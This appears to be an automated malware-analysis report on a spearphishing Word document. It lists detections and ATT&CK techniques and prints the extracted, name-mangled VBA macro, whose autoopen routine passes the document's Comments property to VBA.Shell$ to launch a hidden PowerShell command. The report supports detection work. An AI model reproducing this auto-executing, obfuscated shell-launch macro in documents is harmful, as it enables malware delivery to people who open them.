MALICIOUS
232
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
The sample is a malicious Office document containing VBA macros. The 'autoopen' macro is designed to execute a PowerShell command, likely to download and run a second-stage payload. The document body uses a common lure to trick users into enabling macros, which is a typical characteristic of spearphishing attachments.
Heuristics 9
-
ClamAV: Doc.Macro.DollarShell-6346616-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.DollarShell-6346616-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
rgunGKACxt = "LTWSuAVNXeH" + "NhXhHxe" + "TPrnGxU" + "SwARZbPM" + "GScNMumzyG" + "VnCvSPK" + "tCpUueXrD" + fHmWwzBZv = "CmfSvKmgx" + "yVzBStD" + "GrBknMnSx" + "AgdPLwyyK" + "VDAvzUgF" + "kZfXVUBGunx" + "NcdRFkavnsM" + sdnuVDxC = "BkcTgFgX" + "StRSrvC" + "ZFKHSxHEzZ" + "hYvswzHAdgd" + "vGGubApwdtK" + "LvBXaAERV" + "yPTLKGtnWD" + "RnchDDkh" VBA.Shell$ "" + MZvCWhMp + yaPXgCVs + VCnMBVXgUE + bkSTrgpkMb + wMSAXaPkKrR + YEcKHVXBb + NvcybHP + wRPVPgnKD + mYueRaGZK + MfDHAmdCN + ActiveDocument.BuiltInDocumentProperties("Co" + "mments") + MZvCWhMp + yaPXgCVs + VCnMBVXgUE + bkSTrgpkMb + wMSAXaPkKrR + YEcKHVXBb + NvcybHP + wRPVPgnKD + mYueRaGZK + MfDHAmdCN + xudcrHU, 0 VYmvgZhFWWf = "AtUHynn" + "dmySAGA" + "RhttnDsyvu" + "EyRKmmS" + "LSsZfdZGL" + "PrfKALb" + "YdRAeHU" + emHeCCHSDHs = "LtNxafDThU" + "nfXmRFKzN" + "NwTrBrWfZ" + "yLGWzuyNt" + "CcPakgUxCD" + "EkcpFCCASLd" + "XFgZvHmZcHx" + AWpYPrhp = "SSDCPfAEnH" + "YavxhphHcDv" + "DBNgaCG" + "KPRbzaC" + "HFWxVSrx" + "xXKbTtBt" + "gKgeYCTR" + xhdachH = "tDXthEgA" + "HMHSwSXMT" + "bLGNWGTb" + "VVXnTUpBP" + "HnzPahRMZrZ" + "VdZvdRtWsSE" + "fBkXfevUp" + "UYWRTUxf" -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "Module1" Sub autoopen() nYrtvtK -
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7531 bytes |
SHA-256: 3e65c4974b68b49da74756db4914177b33349eaf7c3f9e115b0650b1b3216ac0 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
452 of 526 identifiers look randomly generated (e.g. 'SSLmxMYVHTc') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub autoopen()
nYrtvtK
End Sub
Function nYrtvtK()
dXButXdfASB = "BeffKNnMB" + "gYNDKeUhHy" + "WKamRRDfz" + "eaaYXRFfB" + "fsNkBKZkHE" + "hDsWWPBbyht" + "WrvGyLFu" + afcbyYVBWe = "wLGwUHGt" + "dMagEaC" + "nPsFLGXhfrf" + "NNSuupCsAM" + "ANPbwbeHG" + "kXSFfSwdzRd" + "GTxtpRuEd" + LLAWNxUFCK = "WEFYskg" + "CYRavxpDLd" + "vagBdxK" + "yzZNVNf" + "BnhswKsTdhr" + "tnGhMFhtGw" + "gZRUKEFK" + epfNaxrXbb = "tHMfXrmg" + "MDvkrUpp" + "UxrWzYry" + "vLWYKPLK" + "nhzwpctxHg" + "YvMwfYA" + "CzCckNefGKT" + eNkttxxFX = "aFdnEeAuZ" + "YpDEYxsy" + "HwZMfVs" + "vPSLptSVUh" + "pPzEngHK" + "ZKBhLGbB" + "FDvnrhS" + "ZnNmcNt"
XekAzhh = "LDgvhmk" + "mBAASMk" + "zAwgFWLUM" + "CchyUvDvAK" + "hsptEkaRx" + "tHDhwFUC" + "TsuAfghztt" + dCmSUZGX = "ddkscYP" + "MbhygCcXwK" + "cnYLkVttAYr" + "ywfHstBG" + "HtMCKSdyx" + "dEdtcbbbSc" + "RZGSBDkbV" + yNmyWXDbkTd = "kEBszKsMbeE" + "NFdAmRfKks" + "GSGuLRuNG" + "nxdFMRp" + "KLYsNdGvsrL" + "FGdAeWC" + "wXHYxZNd" + hZUKtCN = "SnHexFfPR" + "PRdrdPThza" + "UVKzxPzSSRG" + "tdxZEFbDk" + "fZxdSLWnKds" + "dgfPzNxSW" + "yuDYvyybcRT" + "HpGFAdpPS"
bRMkgHD = "yXEvKfShLS" + "dGAvzDEzDGz" + "NsFsYKD" + "ZGMFTEEsULd" + "vHpnMDze" + "VKRYSrU" + "exrRaTgwLF" + eGPdEyxN = "MBehgdxA" + "yWdHcLkNDCy" + "AkBhxsaRBV" + "SpSuWfuNnCU" + "UBKWCDT" + "udVCbFdRY" + "xcWBhUrVTXw" + dcLWxuL = "UeYZhuNgKLc" + "HeFsSHzMbWZ" + "VgHrnVH" + "TuuKbMuVZem" + "XKPDVfSU" + "VhKcHpMevvw" + "MpBksHDBd" + "wzSUcHMVELb"
MGzAPyZ = "dAaLEvp" + "bBGXZwXh" + "sKkGBBdgD" + "ezmnDzrmy" + "SYaTYauAgVY" + "tdvkZDydF" + "yVWPLSncCN" + EgXemFvL = "dXWfKeeaRxc" + "mnPpEHAwCd" + "vwupAZfLeUT" + "SKaYVsXMgkD" + "dFugsAUHTwr" + "LhXvrSHNb" + "AEBaKYuDr" + PvNtFdXErth = "HnfdwGCuegU" + "wZcNLgcc" + "crWLaUDkF" + "uftyXYDNh" + "ErfBcTezADd" + "EFUTzRmZ" + "tNyZEft" + GxAaUxdZ = "rKCttbnkR" + "bZVXGdL" + "gzBavbrPc" + "EwasHazA" + "zpbNtFyKVs" + "vFgYHWypgh" + "mYdGGuXbTdZ" + zuWtwRxW = "THKxkeMur" + "yCWVNpP" + "EKcpgdEPxRx" + "PzefNCrwdZ" + "xnpygmfdxZ" + "bmnSNhBdE" + "ckvmsManu" + YPRLYmSs = "vhEShZkrLV" + "kxfdpbm" + "TCDrHXtsCc" + "yXhyKzS" + "kPranzTGzUv" + "LBxxstS" + "sBPWseZp" + "yFeNNKwME"
yrcNDyPf = "zNEWnbCaZ" + "TBRtyYsRNs" + "HykUDbG" + "NxwrCfFYU" + "sxAdVMr" + "GdZNWEe" + "wDMxXmbh" + GDApzzFntnK = "HySteNR" + "XLKTzmNgGp" + "szwDVUk" + "pbzsxgGSxy" + "FbwrKRKBLgp" + "hYwudbyCnmA" + "DNugCdNfuxD" + XhHMstu = "bRBzMKdp" + "aERPzhZkdA" + "pZBMLgm" + "vxvPDEv" + "mFLrwBnAP" + "GunVxZzeB" + "BtCvMyAD" + ynatwEsWV = "fHxNpCKHhye" + "AenzUdbgh" + "dzxNefc" + "swSrAYnTFw" + "yLpKRvFMuyT" + "TVTUZBFS" + "TRbUdKCA" + xzWrvDFacL = "ECxTMwDB" + "WwSZPpRvC" + "vvRxtHcXsny" + "ykyKPgafb" + "sYbDWAudx" + "nHPGCwRXfcD" + "YxcxsefV" + "NrBAMKUTC"
vBedLpdS = "ppgdZpXpKU" + "hDAEpbPhFX" + "SvCXMRp" + "kmHWCcwSy" + "hNLeWnwt" + "vszhkuev" + "bXHBwygfht" + EyvFdAc = "VSwdmYyTvh" + "AwcdMeaYh" + "DyGVNkyvB" + "ZuYdpLyDrg" + "hDerXZNeUGc" + "UEKsFBXVYcC" + "ZCBAZgMvkLs" + "CYcKSEUEe"
CcBacrTnHv = "FeCCdsFGpG" + "RzXyPxmG" + "WRspAsGs" + "PTwmDHgmkS" + "DSdvecCR" + "TKnXzaSzgMC" + "dNzUgyKW" + ArLuZSNBFPW = "vXRUsDy" + "FfvNLgZ" + "wPFdtBL" + "SyyPkZsryGC" + "gynaTgeef" + "fkWDuVb" + "RGvzBzVu" + ttKcEbC = "YCAgbzbf" + "RkTZCyXNkn" + "TnDgphP" + "WXcykUZtf" + "CXmnGLmAmG" + "VHRunahvwkB" + "PMSBMbgdz" + "wDZzuAeMFa"
rgunGKACxt = "LTWSuAVNXeH" + "NhXhHxe" + "TPrnGxU" + "SwARZbPM" + "GScNMumzyG" + "VnCvSPK" + "tCpUueXrD" + fHmWwzBZv = "CmfSvKmgx" + "yVzBStD" + "GrBknMnSx" + "AgdPLwyyK" + "VDAvzUgF" + "kZfXVUBGunx" + "NcdRFkavnsM" + sdnuVDxC = "BkcTgFgX" + "StRSrvC" + "ZFKHSxHEzZ" + "hYvswzHAdgd" + "vGGubApwdtK" + "LvBXaAERV" + "yPTLKGtnWD" + "RnchDDkh"
VBA.Shell$ "" + MZvCWhMp + yaPXgCVs + VCnMBVXgUE + bkSTrgpkMb + wMSAXaPkKrR + YEcKHVXBb + NvcybHP + wRPVPgnKD + mYueRaGZK + MfDHAmdCN + ActiveDocument.BuiltInDocumentProperties("Co" + "mments") + MZvCWhMp + yaPXgCVs + VCnMBVXgUE + bkSTrgpkMb + wMSAXaPkKrR + YEcKHVXBb + NvcybHP + wRPVPgnKD + mYueRaGZK + MfDHAmdCN + xudcrHU, 0
VYmvgZhFWWf = "AtUHynn" + "dmySAGA" + "RhttnDsyvu" + "EyRKmmS" + "LSsZfdZGL" + "PrfKALb" + "YdRAeHU" + emHeCCHSDHs = "LtNxafDThU" + "nfXmRFKzN" + "NwTrBrWfZ" + "yLGWzuyNt" + "CcPakgUxCD" + "EkcpFCCASLd" + "XFgZvHmZcHx" + AWpYPrhp = "SSDCPfAEnH" + "YavxhphHcDv" + "DBNgaCG" + "KPRbzaC" + "HFWxVSrx" + "xXKbTtBt" + "gKgeYCTR" + xhdachH = "tDXthEgA" + "HMHSwSXMT" + "bLGNWGTb" + "VVXnTUpBP" + "HnzPahRMZrZ" + "VdZvdRtWsSE" + "fBkXfevUp" + "UYWRTUxf"
UMNWUFnnv = "vhHzAtDdsv" + "pbspLTRRuxg" + "zsVVTAh" + "TsAMMCNVAP" + "ewxztBfxBp" + "nabHbzSC" + "mustdcT" + NNypadHFyzx = "HBnfEpZNDf" + "cLRxPhzFzD" + "vsYNyFC" + "hnUgwBcaX" + "eBBcAkHM" + "fGBuFGNUcwT" + "xfVCeYGUw" + nuyXpCFPg = "srCEHSazXs" + "NbuCWUKHx" + "uaSufCpuR" + "kMGDafPA" + "rgwWbUUMd" + "mgnCdVZrRM" + "RwHXTXgyvP" + mdUXUzx = "ugrZFnkbn" + "ntAcuNWu" + "tmTxtXs" + "yYWfmFZtrG" + "KWhSnHX" + "hZLDrhDA" + "fdtMTtYF" + UrnChthgSm = "aYcPKaKHFgE" + "pMukpfeKfWU" + "RywSyHSBWWZ" + "XaNDbwcDPm" + "nfeCruDCSd" + "sGbfbxdKC" + "nvAYPtFEt" + "nCwwdALRLuf"
zczstKypV = "vNBUpGMeWT" + "vSDyBCdDB" + "UTkAwUwyeu" + "ttEdfATcGk" + "trrCrygxb" + "taTmfvSdfpS" + "gLgTXGxL" + eAgTxVvV = "eHASfbHbMG" + "WzYfVwZMs" + "hZtghcfR" + "DsSLLSCDvf" + "XgDAWxzDChf" + "ezeGSfUKg" + "RanZfWmHKd" + "sRvkMLg"
UrwMmvDU = "LswnHteCwrN" + "BWnMsNbzYNV" + "VCcCvBaSdz" + "WCbGxkuzCk" + "aRKSmRdYdu" + "CAbnxMmxPdL" + "VDSPbHFE" + yMtNaEeHtGA = "pdRAzEsLGN" + "PZvBemad" + "YWDugXWUT" + "ZWnKKAFYPFg" + "vAmydcR" + "ztwEwLvDa" + "eXauBwFUYp" + abtTfvUS = "pKYYWFBUS" + "XnSEfSYr" + "pWTEsxLvgr" + "TAwhxKK" + "wGKdWhazrfY" + "KnuXwfCUEm" + "nAegVwt" + kPBKNzUnrAK = "nBzhUcuKzF" + "NZSvHnddmz" + "ZscUSERWvW" + "UttryrnTvYB" + "CSDgeSwXT" + "DCRxaGL" + "MgDDbGK" + tfkNmZWdy = "fpyPpbr" + "SgehMxtee" + "SGFBfsRPU" + "YvCCexL" + "xShuTbM" + "XPPbUNtyYz" + "eNpAyrX" + nLCTCAmD = "shHftGrHkL" + "DbFfDSeWZT" + "mGvkbvwsL" + "pAcLAEt" + "XHCMDntSvG" + "xnNaHSPPXB" + "YPesPENSZg" + "FrFErYB"
KZsVFBz = "PuMnPxN" + "sVfruSv" + "wHRbxtZHSA" + "CwhdkDbSA" + "MyKrkDLymwT" + "DcxscephuG" + "WDHPPaUd" + XKcHpBMwgxG = "MpzNKuXnff" + "MRFvVFD" + "LMXshrGZxN" + "zKAtHexg" + "aDmhWRbyU" + "SWCEDSzS" + "PdkYZxgA" + PSMxUynvRf = "vZaMrSZ" + "hkprmBUB" + "aUgaGWwySxM" + "DMBwzTHbeN" + "kAUcNXsbshD" + "LZuhFEnSe" + "nxWGArt" + tcYvZyE = "CFSWnuwufFG" + "PNUFXxypLG" + "pTdfTXUkRn" + "mSKvYCu" + "hZDkHPu" + "YUdCUUgM" + "yvgBggnK" + "pfevftp"
yMmTRuyzgy = "PEvCabAfY" + "buLRYeTGCK" + "nDRrvzx" + "TxyfRSWFsbK" + "HZerggN" + "aafuerK" + "cTKUdpSfvF" + wpShHzbYY = "yWFySvyf" + "PauUrnTc" + "kCRTyDyYT" + "vMYEkFePd" + "BGaPbWGB" + "YRemRdMgh" + "VVupLywBxay" + ENnsAKaVUW = "wkhPEtnWDF" + "CmSGtHe" + "zbzYdwYW" + "dpRPbUkWP" + "LemfdKw" + "HpkXCLu" + "RpZsKNnxpvH" + RayUXSkrG = "msSWZSKna" + "kFrFzThUgYH" + "VfbgWXFkLh" + "wBXYyaK" + "SAeEFCd" + "SBLkPCpB" + "VrMrmZuas" + "ZEWBRSzBbcw"
YdGtrdhz = "naSwDcCs" + "tmswZCtbALK" + "PYytfru" + "nyNLSEYeBn" + "NMdXEMrb" + "hWrBAtCMF" + "dHzmftf" + XtnckLmusaX = "NWFKSEWCf" + "FUVCkrygYET" + "LEugZTLT" + "rTwcNpCPN" + "zmDSYupn" + "YSTNLpkdvE" + "YAREFzpUwpA" + "YZBZTrHmLgm"
GRduHgeyN = "TbAkyBY" + "LuSuGvaxv" + "nmrSAwws" + "DtBcUAK" + "DzfuxaaEzh" + "bEhWRRKFtUP" + "CWaEBScwET" + bVYFrfkrdzS = "pewUcraX" + "zgFADTw" + "bpDmpsxwHsW" + "wyCyyww" + "GugtPYWxmW" + "kdTSFuHbsh" + "SSLmxMYVHTc" + "SnkfyMBzBP"
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.